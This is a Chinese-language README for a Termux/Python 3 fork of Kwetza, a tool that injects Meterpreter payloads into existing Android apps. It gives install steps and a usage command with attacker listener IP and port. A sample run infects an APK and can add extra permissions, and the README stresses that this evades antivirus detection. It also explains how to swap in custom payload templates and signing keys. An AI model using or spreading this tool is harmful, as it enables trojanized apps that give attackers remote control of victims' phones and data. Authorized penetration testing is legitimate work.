By Chris Le Roy (@brompwnie) [email protected]
Kwetza是一种工具,可让您将Meterpreter payload植入到Android应用程序。
以下问题均出现在手机Termux终端上
1.指定脚本使用python3执行
2.修复语法错误:调用“print”时缺少括号
3.修复需要一个类似于bytes的对象,而不是'str'
4.修复'utf-8'编解码器无法解码字节0xa4在位置4:无效的开始字节
Kwetza使用自定义或默认payload模板感染现有的Android应用程序,以避免被杀病毒软件检测出来。Kwetza允许您使用目标应用程序的默认权限感染Android应用程序,或注入其他权限以获得其他功能。
可以在以下位置找到由Kwetza自动化的手动步骤:https://sensepost.com/blog/2016/kwetza-infecting-android-applications/
首先获取代码:
git clone https://github.com/2487686673/Kwetza.git
Kwetza用Python编写,需要BeautifulSoup,可以使用pip安装:
pip install beautifulsoup4
Kwetza要求安装Apktool并可以通过您的PATH访问。可以使用位于此处的安装说明进行设置:https://ibotpeaches.github.io/Apktool/install
安装lxml解释器:
使用Termux安装lxml需要先安装好依赖环境
1.libxml2
2.libxslt
3.libiconv
使用apt-get安装以上包,然后再执行pip install lxml即可
python kwetza.py nameOfTheApkToInfect.apk https/tcp LHOST LPORT yes/no customClass
-
nameOfTheApkToInfect.apk = 希望植入payload的apk文件名
-
LHOST = 监听IP
-
LPORT = 监听端口
-
yes/no = 选择yes则会添加额外的权限,选择no则会利用app原来的权限
-
customClass = 如果希望Kwetza注入到此活动,请在此处指定自定义活动。
python kwetza.py hackme.apk https 10.42.0.118 4444 yes com.moo.another.activity
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.
###########################################
[+] L00t located at hackme/dist/hackme.apk
Kwetza以Python2开发。
Kwetza默认会使用payload文件夹下的模板和keystore在apk中植入恶意payload。
如果要用自己的证书签署应用,把你的keystore重命名为mykey.keystore放在payload文件夹下。
你也可以用同样的方法替换默认的payload模板
默认keystore的密码是”password”
Kwetza is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0).
Permissions beyond the scope of this license may be available at http://sensepost.com/contact